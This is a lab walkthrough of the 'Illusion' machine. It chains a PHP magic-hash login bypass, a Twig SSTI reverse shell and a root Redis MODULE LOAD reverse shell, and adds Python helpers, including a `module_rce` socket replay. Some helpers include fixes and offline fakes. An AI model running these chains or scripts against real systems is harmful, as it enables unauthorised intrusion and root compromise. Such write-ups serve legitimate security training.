Illusion
Gaining Access
Nmap scan:
We can start proxying traffic through Burp.
Web Enum -> Magic Hashes
Port 80 presents a corporate web page with a Login:
The login page is basic and runs on PHP:
Default credentials don't work here, and brute forcing doesn't work either. Since the backend is PHP, it is worth trying Magic Hashes: if the code compares the hash of the submitted password against the stored hash with the loose `==` operator, two digests that both consist of `0e` followed only by digits are treated as numeric strings and compare equal (both evaluate to zero), so we can get in without knowing the password by submitting this request:
This works because the `Location` header now points to `dashboard.php`:
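To make the PHP type-juggling step above concrete, here is an added example (not code from the original writeup or from the target application) that emulates PHP's loose string comparison, checks whether a digest is "magic", and shows the vulnerable check next to the fixed one. It assumes the login hashes with md5 and compares with `==`; the page does not show the actual hash function or comparison, and the candidate list and the stored digest used in the demo are constructed.

```python
import hashlib
import hmac
import re

# PHP's notion of a numeric string: optional leading whitespace, optional sign,
# digits with an optional fraction, optional exponent.  A hex digest such as
# "0e462097431906509019562988736854" matches because "0e" + digits reads as a
# float literal (zero times ten to a large power) in PHP's eyes.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a, b):
    """Emulate PHP's `$a == $b` for two strings.

    When both operands are numeric strings PHP compares them as numbers, so two
    "0e..." digests are equal (both are 0.0) even though the bytes differ.
    Anything else is compared byte for byte.  PHP 8 changed how a number
    compares against a non-numeric string, but numeric string versus numeric
    string is still a numeric comparison, so this trick survives there too.
    """
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic(digest_hex):
    """True when a hex digest is '0e' followed only by decimal digits."""
    return re.fullmatch(r"0e\d+", digest_hex) is not None


def find_magic(algo, candidates):
    """Return (input, digest) pairs whose digest under `algo` ("md5", "sha1", ...) is magic."""
    hits = []
    for cand in candidates:
        digest = hashlib.new(algo, cand.encode()).hexdigest()
        if is_magic(digest):
            hits.append((cand, digest))
    return hits


# Constructed candidate list: two widely known md5 magic inputs among ordinary guesses.
CANDIDATES = ["admin", "password", "240610708", "hunter2", "QNKCDZO"]


def login_loose(stored_digest, submitted, algo="md5"):
    """Hypothetical vulnerable check: `if (md5($_POST['password']) == $row['hash'])`.

    If the stored digest is itself magic, any magic input logs in.
    """
    return php_loose_eq(hashlib.new(algo, submitted.encode()).hexdigest(), stored_digest)


def login_strict(stored_digest, submitted, algo="md5"):
    """Hardened check: constant-time byte comparison, the equivalent of PHP's
    hash_equals() (or at least `===`), which never coerces to a number."""
    return hmac.compare_digest(hashlib.new(algo, submitted.encode()).hexdigest(), stored_digest)


if __name__ == "__main__":
    for cand, digest in find_magic("md5", CANDIDATES):
        print(f"{cand!r:14} md5={digest}")
    # Assume (constructed) that the stored admin hash is md5("240610708"): any
    # other magic input, e.g. "QNKCDZO", passes the loose check but not the strict one.
    stored = hashlib.md5(b"240610708").hexdigest()
    print("loose :", login_loose(stored, "QNKCDZO"))
    print("strict:", login_strict(stored, "QNKCDZO"))
```

Feed `find_magic` a generator over a wordlist or `str(i) for i in range(...)` to hunt for more; `hashlib.new` takes any algorithm name OpenSSL knows, so the same search works for sha1 or sha256 if the application uses those.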
Orders -> SSTI
The dashboard is simple. If we submit any query, our order name pops up at the top:
Since this website runs on PHP and the input value is printed back on screen, I wanted to test for SSTI by using `{{7*7}}` as the name of the order, and it works:
On Hacktricks, there's a whole section for Twig (PHP), and I tried their payload to run `id`:
This confirms that SSTI works and that we have RCE on the machine. Sending this payload gets us a reverse shell:
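The `{{7*7}}` probe above has a weakness: `49` may already be somewhere on the page, so a hit is not proof of evaluation. This added example (not from the original writeup; the dashboards it tests against are constructed stand-ins) probes with random operands whose product cannot appear by accident, and then runs the usual first fork of the SSTI decision tree, `{{13*'17'}}`, which Twig renders as 221 (the string is coerced to a number) and Jinja2 renders as the string repeated thirteen times. The `send` callable is the only thing you swap for a real target.

```python
import html
import random
import re


def make_probe():
    """Build an arithmetic probe and the string a template engine would render for it.

    Two random four-digit operands give a seven- or eight-digit product that cannot
    occur inside the reflected payload itself, unlike '49' from {{7*7}}.
    """
    a, b = random.randint(1000, 9999), random.randint(1000, 9999)
    return f"{{{{{a}*{b}}}}}", str(a * b)


def classify_ssti(send):
    """Probe through `send(payload) -> response body` and report what the reflection does.

    Returns "not-evaluated", "twig-like", "jinja2-like" or "evaluated-unknown".
    """
    payload, expected = make_probe()
    if expected not in send(payload):
        return "not-evaluated"          # arithmetic was echoed, not computed
    body = send("{{13*'17'}}")          # engine differentiator
    if "17" * 13 in body:
        return "jinja2-like"            # Python semantics: int * str repeats
    if "221" in body:
        return "twig-like"              # PHP semantics: '17' coerced to 17
    return "evaluated-unknown"


# --- Constructed stand-ins for the order dashboard so this runs offline -----------
_MUL = re.compile(r"\{\{\s*(\d+)\s*\*\s*(?:(\d+)|'(\d+)')\s*\}\}")


def fake_twig_dashboard(order_name):
    """Echoes the order name after Twig-style evaluation: a quoted operand becomes a number."""
    def render(m):
        return str(int(m.group(1)) * int(m.group(2) or m.group(3)))
    return "<h2>Order: " + _MUL.sub(render, order_name) + "</h2>"


def fake_jinja_dashboard(order_name):
    """Same reflection, but Jinja2/Python semantics: int * 'str' repeats the string."""
    def render(m):
        left = int(m.group(1))
        return str(left * int(m.group(2))) if m.group(2) else m.group(3) * left
    return "<h2>Order: " + _MUL.sub(render, order_name) + "</h2>"


def fake_safe_dashboard(order_name):
    """The fix: user input is data handed to the template, never template source."""
    return "<h2>Order: " + html.escape(order_name) + "</h2>"


if __name__ == "__main__":
    for label, site in [("twig", fake_twig_dashboard),
                        ("jinja2", fake_jinja_dashboard),
                        ("safe", fake_safe_dashboard)]:
        print(f"{label:7} -> {classify_ssti(site)}")
```

Against the real dashboard you would pass something like `lambda p: requests.post(URL, data={"name": p}, cookies=session).text`, where the URL, the form field name and the session cookie are whatever your Burp capture shows; the page does not give them, so they are assumptions here.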
Privilege Escalation
Redis Creds -> RCE
Within the user's directory, there was a Redis-related file that contained a hash:
Checking the listening ports using `netstat` reveals that port 6379 is listening and is likely Redis:
We can port forward this using `chisel`, which exposes the box's Redis port on our attacking host, after which we can connect to the database with `redis-cli`. Attempts to run commands fail because we aren't authenticated (Redis answers with `NOAUTH Authentication required.`):
In this case, we can try the hash that we found earlier as the password with `AUTH`.
There was nothing interesting within the database, but I did want to know who was running it. A quick `ps -elf` reveals that the `root` user is running it:
Since `root` is running it and we can authenticate, we can also load any module that we want with `MODULE LOAD`; the module's code then runs inside the Redis process, i.e. as `root`. (The `.so` has to exist on the Redis host's filesystem, which is why it is uploaded first; note also that from Redis 7.0 `MODULE LOAD` is refused unless `enable-module-command` is set in the config, so this only works on older or permissively configured servers.) This repository has a module that works:
Compile and upload the `.so` file to the machine, then load it within `redis-cli`:
We can get a reverse shell via `system.rev <IP> <PORT>`:
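The AUTH, MODULE LOAD and `system.rev` steps above are three RESP commands in sequence, and the point at which the chain breaks tells you what is wrong (bad password, modules disabled, module not loaded). This added example (not from the writeup or the module repository) is a minimal RESP2 encoder/decoder plus a function that replays that exact sequence over any transport and stops at the first error reply. `system.rev` is the command named on the page; the module path `/tmp/module.so`, the attacker IP and port, and the `fake_redis` server used to run it offline are constructed assumptions.

```python
import socket


class RedisError(Exception):
    """An error reply ("-ERR ...", "-NOAUTH ...", "-WRONGPASS ...") from the server."""


def encode_command(*args):
    """Serialise a command as a RESP array of bulk strings, the bytes redis-cli
    puts on the wire for e.g. `AUTH s3cret` or `MODULE LOAD /tmp/module.so`."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        data = arg.encode() if isinstance(arg, str) else arg
        parts.append(b"$%d\r\n%s\r\n" % (len(data), data))
    return b"".join(parts)


def _parse(buf):
    """Parse one RESP2 value from `buf`; return (value, remaining bytes)."""
    kind, body = buf[:1], buf[1:]
    line, _, rest = body.partition(b"\r\n")
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        raise RedisError(line.decode())
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest
        return rest[:n].decode(), rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = _parse(rest)
            items.append(item)
        return items, rest
    raise ValueError("not a RESP value: %r" % buf[:16])


def parse_reply(buf):
    """Decode a complete reply; raises RedisError for an error reply."""
    return _parse(buf)[0]


def module_rce(transport, password, module_path, lhost, lport):
    """Replay the writeup's sequence over `transport(bytes) -> bytes` and return
    [(command, reply), ...], stopping at the first error so it is obvious
    whether AUTH, MODULE LOAD or the module's own command failed."""
    steps = [("AUTH", password),
             ("MODULE", "LOAD", module_path),
             ("system.rev", lhost, str(lport))]
    log = []
    for cmd in steps:
        try:
            reply = parse_reply(transport(encode_command(*cmd)))
        except RedisError as err:
            log.append((" ".join(cmd), "ERROR " + str(err)))
            break
        log.append((" ".join(cmd), reply))
    return log


def socket_transport(host, port):
    """Real transport, e.g. socket_transport("127.0.0.1", 6379) over the chisel forward."""
    conn = socket.create_connection((host, port))

    def send(raw):
        conn.sendall(raw)
        return conn.recv(65536)   # enough for the short +OK / -ERR replies used here
    return send


def fake_redis(password="s3cret", modules_allowed=True):
    """Constructed stand-in for the target: requirepass set, MODULE LOAD optionally
    refused the way Redis 7 does by default (error text abridged)."""
    state = {"authed": False, "loaded": False}

    def transport(raw):
        cmd = parse_reply(raw)             # a command is itself a RESP array
        name = cmd[0].upper()
        if name == "AUTH":
            if cmd[-1] == password:
                state["authed"] = True
                return b"+OK\r\n"
            return b"-WRONGPASS invalid username-password pair or user is disabled.\r\n"
        if not state["authed"]:
            return b"-NOAUTH Authentication required.\r\n"
        if name == "MODULE" and cmd[1].upper() == "LOAD":
            if not modules_allowed:
                return b"-ERR MODULE command not allowed. enable-module-command is not set\r\n"
            state["loaded"] = True
            return b"+OK\r\n"
        if name == "SYSTEM.REV" and state["loaded"]:
            return b"+OK\r\n"
        return b"-ERR unknown command '%s'\r\n" % cmd[0].encode()
    return transport
```

Run it for real as `module_rce(socket_transport("127.0.0.1", 6379), "<hash>", "/tmp/module.so", "<IP>", <PORT>)` with your listener already waiting; if the second entry in the returned log is an `ERROR ERR MODULE ...`, the server is a Redis 7 with modules disabled and this route is closed regardless of the credentials.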
Rooted!